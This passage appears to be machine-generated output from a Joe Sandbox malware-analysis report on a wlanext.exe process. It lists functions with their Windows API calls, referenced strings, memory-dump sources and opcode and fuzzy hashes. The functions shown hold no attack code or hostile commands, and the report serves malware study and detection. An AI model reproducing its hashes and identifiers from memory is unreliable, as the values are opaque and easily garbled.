                                                                                • HandlerTimeout, xrefs: 00C034EA
                                                                                • Software\Microsoft\Wlansvc\IHVExtensibility, xrefs: 00C03485
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CloseMessageOpenQueryTraceValue
                                                                                • String ID: HandlerTimeout$Software\Microsoft\Wlansvc\IHVExtensibility
                                                                                • API String ID: 3821667754-1486466383
                                                                                • Opcode ID: a8a9fac799908d2e1a6a5df1f10c32d7b519b0a480da15170f90322a6fa48f37
                                                                                • Instruction ID: b85964f972fa427737bb557cb0d7f2e5782041783b6f0aa7d40defcfe9afff7c
                                                                                • Opcode Fuzzy Hash: a8a9fac799908d2e1a6a5df1f10c32d7b519b0a480da15170f90322a6fa48f37
                                                                                • Instruction Fuzzy Hash: 63415D71A00288AFEB26CF94DC48F9EBEBABB09704F154495E511A71F2C371CB94DB54
                                                                                Function 00C0A1A1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00C12620,00C01680,00C120B0,?,?,?,00C038A6,00C120B0,00C120B0,00C120A0), ref: 00C0A1E6
                                                                                • QueueUserWorkItem.KERNEL32(00C09B23,00000000,00000010), ref: 00C0A24E
                                                                                • GetLastError.KERNEL32(?,?,?,00C038A6,00C120B0,00C120B0,00C120A0), ref: 00C0A258
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                • LeaveCriticalSection.KERNEL32(00C12620,C01F8AD4,?,?,?,00C038A6,00C120B0,00C120B0,00C120A0), ref: 00C0A2CB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterErrorItemLastLeaveMessageQueueTraceUserWork
                                                                                • String ID: call table
                                                                                • API String ID: 1836903735-1857531114
                                                                                • Opcode ID: 010c75d694a68347d03f3c25a0a7ebec51bf7e3c40c6a35e974916bea636f129
                                                                                • Instruction ID: 55ff84c2ce684e788bfb1a9e6c253cb383e5c25ba75b38b8d6f78847003a86c4
                                                                                • Opcode Fuzzy Hash: 010c75d694a68347d03f3c25a0a7ebec51bf7e3c40c6a35e974916bea636f129
                                                                                • Instruction Fuzzy Hash: CD419074680344BFEF158F90C948F98BFA5BB05748F1580A4FA159B1F2C372DA90EB46
                                                                                Function 020814C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ___swprintf_l.LIBCMT ref: 020AEA22
                                                                                  • Part of subcall function 020813CB: ___swprintf_l.LIBCMT ref: 0208146B
                                                                                  • Part of subcall function 020813CB: ___swprintf_l.LIBCMT ref: 02081490
                                                                                • ___swprintf_l.LIBCMT ref: 0208156D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: %%%u$]:%u
                                                                                • API String ID: 48624451-3050659472
                                                                                • Opcode ID: 34fe918236c3a0f0eafeec7918a8aa2a167af07c85bccd96f9c1da010f6528ce
                                                                                • Instruction ID: 4cdf00441a7d121ebe7ec1066c042cd656cb9bacd610d3e50f854f60156c06b4
                                                                                • Opcode Fuzzy Hash: 34fe918236c3a0f0eafeec7918a8aa2a167af07c85bccd96f9c1da010f6528ce
                                                                                • Instruction Fuzzy Hash: DD2193B2900319EBDB61EE54CC40AEFB3EDAF10704F444565EC8AD7140DB70AA59DBE1
                                                                                Function 00C0ABB1 Relevance: 7.7, APIs: 5, Instructions: 164timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00C12600,00000001,00C120B0,?,?,?,00C08ADC,?,00C085CC,?,00000000,?,00C120B0,00000000,?,?), ref: 00C0ABF0
                                                                                • ChangeTimerQueueTimer.KERNEL32(00000064,00000064,00000000,?,?,?,00C08ADC,?,00C085CC,?,00000000,?,00C120B0,00000000,?,?), ref: 00C0AC51
                                                                                • GetLastError.KERNEL32(?,?,?,00C08ADC,?,00C085CC,?,00000000,?,00C120B0,00000000,?,?,00000000,?,00000000), ref: 00C0AC5B
                                                                                • GetTickCount.KERNEL32(00000014,00000000,00000000,?,?,?,00C08ADC,?,00C085CC,?,00000000,?,00C120B0,00000000,?,?), ref: 00C0AD1A
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                • LeaveCriticalSection.KERNEL32(00C12600,00000000,00000000,?,?,?,00C08ADC,?,00C085CC,?,00000000,?,00C120B0,00000000,?,?), ref: 00C0AD74
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSectionTimer$ChangeCountEnterErrorLastLeaveMessageQueueTickTrace
                                                                                • String ID:
                                                                                • API String ID: 3417154314-0
                                                                                • Opcode ID: e7dbad7b25d774a8b0598feccc1705f5bd1633c5ad5220f28e23db338763f286
                                                                                • Instruction ID: d2a84fb98e2ce58f3dfee8f177f338e201ad1be5e0f4d6d5391f1dc547b5ecd4
                                                                                • Opcode Fuzzy Hash: e7dbad7b25d774a8b0598feccc1705f5bd1633c5ad5220f28e23db338763f286
                                                                                • Instruction Fuzzy Hash: 83518D38640304AFEB25CF54D988B9DBBB6FB09304F1541A9E9119B2F2C371CE90EB52
                                                                                Function 00C0E2E4 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,00C01C50,00C12000,00000001,?,00C0999D,?,00C01680,00C12000,?,00C02F74,00000000,00C120A0,?,00000002,00000000), ref: 00C0E2F6
                                                                                • EnterCriticalSection.KERNEL32(?,?,00C0999D,?,00C01680,00C12000,?,00C02F74,00000000,00C120A0,?,00000002,00000000,00000001,00000000), ref: 00C0E2FC
                                                                                • ResetEvent.KERNEL32(?,?,00C0999D,?,00C01680,00C12000,?,00C02F74,00000000,00C120A0,?,00000002,00000000,00000001,00000000), ref: 00C0E30E
                                                                                • LeaveCriticalSection.KERNEL32(?,?,00C0999D,?,00C01680,00C12000,?,00C02F74,00000000,00C120A0,?,00000002,00000000,00000001,00000000), ref: 00C0E31B
                                                                                • LeaveCriticalSection.KERNEL32(?,?,00C0999D,?,00C01680,00C12000,?,00C02F74,00000000,00C120A0,?,00000002,00000000,00000001,00000000), ref: 00C0E31E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$EventReset
                                                                                • String ID:
                                                                                • API String ID: 3754699133-0
                                                                                • Opcode ID: cb7af7820fbf363a53d232f39e967be8e0d7d53dd45ede9da9bbd57c23dd7c7e
                                                                                • Instruction ID: 8e9c92ea4449b07804564232f139dcfcbc31b9223a1e8e36032062cc68c05091
                                                                                • Opcode Fuzzy Hash: cb7af7820fbf363a53d232f39e967be8e0d7d53dd45ede9da9bbd57c23dd7c7e
                                                                                • Instruction Fuzzy Hash: 35E03076100649ABD310AB56EC84D8BF7ADEFD53643164415E94283520C631F945CBB0
                                                                                Function 00C03C47 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • QueueUserWorkItem.KERNEL32(Function_00003C03,00000000,00000010), ref: 00C03C50
                                                                                • GetLastError.KERNEL32 ref: 00C03C5A
                                                                                • GetCurrentProcess.KERNEL32(000002C9), ref: 00C03C9B
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00C03CA2
                                                                                • ExitProcess.KERNEL32 ref: 00C03CA9
                                                                                  • Part of subcall function 00C0F8F1: TraceMessage.ADVAPI32(?,00000000,0000002B,?,?,?,00000004,00000000,?,00C09358,00C01634,00C01610,0000000A,00C01C50,?,?), ref: 00C0F90C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentErrorExitItemLastMessageQueueTerminateTraceUserWork
                                                                                • String ID:
                                                                                • API String ID: 2743426024-0
                                                                                • Opcode ID: 5a355e2a55300d46fc00c30dad584687d3fd884125361411cafe77d1386b943d
                                                                                • Instruction ID: a6e69f324ccf762101cc3f9430de58422cffaa7083f4da66abc52fef57add3a5
                                                                                • Opcode Fuzzy Hash: 5a355e2a55300d46fc00c30dad584687d3fd884125361411cafe77d1386b943d
                                                                                • Instruction Fuzzy Hash: 3EF02734540280AFF72A9B20DC0DFACBA18BF16785F290618FF12E40E0C7B18B82DB54
                                                                                Function 020653A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 020A22F4
                                                                                Strings
                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 020A22FC
                                                                                • RTL: Re-Waiting, xrefs: 020A2328
                                                                                • RTL: Resource at %p, xrefs: 020A230B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 885266447-871070163
                                                                                • Opcode ID: 5c8d0ce97e0b0500eb755a49fb3f0266251c50af4b9ff7ee6d8d3befb40252ab
                                                                                • Instruction ID: dfe639186b1f823171edeac7e950fdecef51256fba8aec24e256b7714496b38b
                                                                                • Opcode Fuzzy Hash: 5c8d0ce97e0b0500eb755a49fb3f0266251c50af4b9ff7ee6d8d3befb40252ab
                                                                                • Instruction Fuzzy Hash: 6D5117716003126FEB16EB64CCD4FEB73D9AF54724F104269FD45DB280EB61E841ABA0
                                                                                Function 0206EC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 020A248D
                                                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 020A24BD
                                                                                • RTL: Re-Waiting, xrefs: 020A24FA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                • API String ID: 0-3177188983
                                                                                • Opcode ID: e97f58a9718422f2942cd944f44fce501787fd65119a01cc6c61894da0b15650
                                                                                • Instruction ID: b2d6be204119f841497b25b0447594fccbef4b6cf8d41274636a03fbb2cff0e2
                                                                                • Opcode Fuzzy Hash: e97f58a9718422f2942cd944f44fce501787fd65119a01cc6c61894da0b15650
                                                                                • Instruction Fuzzy Hash: 0A41B2B0600305AFDB24DBA8CC98FAF77EAAF44720F108655F9559B2C0D734E941EB60
                                                                                Function 00C0F82D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00C0E2E4: EnterCriticalSection.KERNEL32(?,00C01C50,00C12000,00000001,?,00C0999D,?,00C01680,00C12000,?,00C02F74,00000000,00C120A0,?,00000002,00000000), ref: 00C0E2F6
                                                                                  • Part of subcall function 00C0E2E4: EnterCriticalSection.KERNEL32(?,?,00C0999D,?,00C01680,00C12000,?,00C02F74,00000000,00C120A0,?,00000002,00000000,00000001,00000000), ref: 00C0E2FC
                                                                                  • Part of subcall function 00C0E2E4: ResetEvent.KERNEL32(?,?,00C0999D,?,00C01680,00C12000,?,00C02F74,00000000,00C120A0,?,00000002,00000000,00000001,00000000), ref: 00C0E30E
                                                                                  • Part of subcall function 00C0E2E4: LeaveCriticalSection.KERNEL32(?,?,00C0999D,?,00C01680,00C12000,?,00C02F74,00000000,00C120A0,?,00000002,00000000,00000001,00000000), ref: 00C0E31B
                                                                                  • Part of subcall function 00C0E2E4: LeaveCriticalSection.KERNEL32(?,?,00C0999D,?,00C01680,00C12000,?,00C02F74,00000000,00C120A0,?,00000002,00000000,00000001,00000000), ref: 00C0E31E
                                                                                • WriteFile.KERNEL32(?,?,?,00000000,?), ref: 00C0F898
                                                                                • GetLastError.KERNEL32(?,?,?,00C0D238,?,?,?,?,Function_0000CFE4,?,00000004,SendPacket,00000000,00000000), ref: 00C0F8A2
                                                                                • InterlockedIncrement.KERNEL32(00C124C4), ref: 00C0F8BB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$ErrorEventFileIncrementInterlockedLastResetWrite
                                                                                • String ID: SendPacket
                                                                                • API String ID: 3766001357-2548714312
                                                                                • Opcode ID: 8a5c85b77a141eda95eb6208a04fc3a92049ede7b2fbc344ced6e9d31a7c7f0d
                                                                                • Instruction ID: 7490c79173ed090ee8d28e6e82dd373fc25e5753623a5d8e4fd3823c6eee6af5
                                                                                • Opcode Fuzzy Hash: 8a5c85b77a141eda95eb6208a04fc3a92049ede7b2fbc344ced6e9d31a7c7f0d
                                                                                • Instruction Fuzzy Hash: 1C117236900118FFDF31AFA1CC499DE7F3AFB45764B148135F809535A1D6308AA2EBA0
                                                                                Function 0207FCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: __fassign
                                                                                • String ID:
                                                                                • API String ID: 3965848254-0
                                                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                • Instruction ID: 579f08a5fa0a002bc23f318b9c9933b515169987b1fa350ad49b2f39598415b7
                                                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                • Instruction Fuzzy Hash: 0A919C71D0030AEADF65DF98C8487EEBBF5FF45308F20807AD415A6651E7704A81EB99
                                                                                Function 00C0B80F Relevance: 6.1, APIs: 4, Instructions: 70threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentThread.KERNEL32(00000008,00000001,00000000,?,00C12000,00000000,?,?,00C0B95F,?,?,00000000), ref: 00C0B851
                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,00C0B95F,?,?,00000000,?,?,?,?,00C067ED,?,00000007,InitService,00000000), ref: 00C0B858
                                                                                • GetLastError.KERNEL32(?,?,00C0B95F,?,?,00000000,?,?,?,?,00C067ED,?,00000007,InitService,00000000,00000000), ref: 00C0B862
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00C0B89A
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$CloseCurrentErrorHandleLastMessageOpenTokenTrace
                                                                                • String ID:
                                                                                • API String ID: 3986309575-0
                                                                                • Opcode ID: 1253f3bd2d72eecd3b7e583c55820f7f0463d1a1d30521147d2f6379a2081b29
                                                                                • Instruction ID: f8cac2c6b450221411725ebc2ed1cd221f49bf54d55860dda1ff0a5db3e4db11
                                                                                • Opcode Fuzzy Hash: 1253f3bd2d72eecd3b7e583c55820f7f0463d1a1d30521147d2f6379a2081b29
                                                                                • Instruction Fuzzy Hash: 70218E71200244BFEB26DB54DC4DF9ABBAEAB45748F1981A4FA00961F2C371CE90DB65
                                                                                Function 00C0B74E Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00C01C94,00C12000,?,?,00C0B169), ref: 00C0B78E
                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,00C0B169), ref: 00C0B795
                                                                                • GetLastError.KERNEL32(?,?,00C0B169), ref: 00C0B79F
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00C0B7D7
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseCurrentErrorHandleLastMessageOpenTokenTrace
                                                                                • String ID:
                                                                                • API String ID: 3604925983-0
                                                                                • Opcode ID: 9fc0530f2c10d0e138626aaa94c0bde2051fbcbd0e43a3f328f768f95df6583a
                                                                                • Instruction ID: a1cd23159bffac6805543c4d94d1d1c25a1d03e87679b48b2c26114f75658119
                                                                                • Opcode Fuzzy Hash: 9fc0530f2c10d0e138626aaa94c0bde2051fbcbd0e43a3f328f768f95df6583a
                                                                                • Instruction Fuzzy Hash: 8C21C031210200BFEB26DB58CC4CF4EBAAAFB49758F194094FA00961F2C371CE50DB61
                                                                                Function 00C0E291 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CloseHandle.KERNEL32(?), ref: 00C0E2A3
                                                                                • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00C02A48,00C12000,?,00C0EEB4), ref: 00C0E2B9
                                                                                • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00C02A48,00C12000,?,00C0EEB4), ref: 00C0E2C6
                                                                                • memset.MSVCRT ref: 00C0E2D1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalDeleteSection$CloseHandlememset
                                                                                • String ID:
                                                                                • API String ID: 3880144888-0
                                                                                • Opcode ID: 848665a683aebea2647eb31866bbd7ca212b7f36b363bd0d0be1ed47acacd4e1
                                                                                • Instruction ID: b8d49a7b3e4731786e48849e1a86fac59b0edc76838bd6beac459f58509b8db9
                                                                                • Opcode Fuzzy Hash: 848665a683aebea2647eb31866bbd7ca212b7f36b363bd0d0be1ed47acacd4e1
                                                                                • Instruction Fuzzy Hash: BCF02032100700ABC630AB51DD09F8BB3ECAF90736F050828E68192981C730FA48CEE4
                                                                                Function 00C067AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00C0B8D2: RpcImpersonateClient.RPCRT4(00000000), ref: 00C0B925
                                                                                  • Part of subcall function 00C06142: EnterCriticalSection.KERNEL32(00C12500), ref: 00C06193
                                                                                  • Part of subcall function 00C06142: LeaveCriticalSection.KERNEL32(00C12500), ref: 00C064CF
                                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,00000007,InitService,00000000,00000000), ref: 00C068A2
                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,00000007,InitService,00000000,00000000), ref: 00C068AC
                                                                                  • Part of subcall function 00C0576C: TraceMessage.ADVAPI32(?,?,0000002B,?,?,NULL,0000000A,?,00000004,00000000), ref: 00C057CE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$ClientEnterErrorEventImpersonateLastLeaveMessageTrace
                                                                                • String ID: InitService
                                                                                • API String ID: 1998968471-1647998688
                                                                                • Opcode ID: 3ae28249518390ad0d403126468ac5edbe2006e27f5e4da2c80fd998c514b9f1
                                                                                • Instruction ID: a0b64d29ba18571b9c681dde97bef235b18322eb2b4d5e8458598d0c771e90d9
                                                                                • Opcode Fuzzy Hash: 3ae28249518390ad0d403126468ac5edbe2006e27f5e4da2c80fd998c514b9f1
                                                                                • Instruction Fuzzy Hash: 0E413A70900228ABDF22AF91CC45EDEBF79FF09740F108166F510661E1D7B18AA1EFA1
                                                                                Function 00C0E814 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: HtCreateHandleTable
                                                                                • API String ID: 0-3622291215
                                                                                • Opcode ID: 5133097cadb24c10ee3985c44b989115dfde15d5b8015fc935b4b16da0dea78f
                                                                                • Instruction ID: b7ab030b331fd3ec63cda004ca59eeee169abb690d2cbe02479c496609061678
                                                                                • Opcode Fuzzy Hash: 5133097cadb24c10ee3985c44b989115dfde15d5b8015fc935b4b16da0dea78f
                                                                                • Instruction Fuzzy Hash: C3313EB2650208AFDB00CF29D885F9977A8EB48764F118A56FD25DF3D1D370EA00DB50
                                                                                Function 00C0E499 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteCriticalSection.KERNEL32(?,?,HtDestroyHandleTable,00000183,?,00C12000,?,00C09AB6,00C12000,00C01C50,00C12000,00C12620,?,?,00C09D66,?), ref: 00C0E558
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalDeleteSection
                                                                                • String ID: HtDestroyHandleTable$L2Ht
                                                                                • API String ID: 166494926-2242761165
                                                                                • Opcode ID: 9e96d789ab5733b636fd5ce417c92276ced27b5af947d02b561e38a348c2b84f
                                                                                • Instruction ID: a5727becb7fbb781183ac56548f4a91617b2dd08f22fcb9b80a47a4f29957bfd
                                                                                • Opcode Fuzzy Hash: 9e96d789ab5733b636fd5ce417c92276ced27b5af947d02b561e38a348c2b84f
                                                                                • Instruction Fuzzy Hash: 7D31F971A40214EFCB18CF59DC94E597BA5FF88758B1549A9F91A8F3A1D330EE80CB90
                                                                                Function 00C02D0B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TraceMessage.ADVAPI32(?,?,0000002B,?,?,?,00000004,NULL,0000000A,?,00000004,00000000), ref: 00C02D73
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: MessageTrace
                                                                                • String ID: <NULL>$NULL
                                                                                • API String ID: 471583391-888386124
                                                                                • Opcode ID: 92256d760d8f0872bd18804bb4fe9ad0165d9edd758e3c3c846810f62ffb3c9f
                                                                                • Instruction ID: 6d49ad3ff4c917949f7db843c4012fe9e4d78a5104a9d6e4a8a5900cabf7da85
                                                                                • Opcode Fuzzy Hash: 92256d760d8f0872bd18804bb4fe9ad0165d9edd758e3c3c846810f62ffb3c9f
                                                                                • Instruction Fuzzy Hash: 69018F7260030AABEF119F44CC09FB67329EB98700F188415FE659B1E4D7B1DE95D791
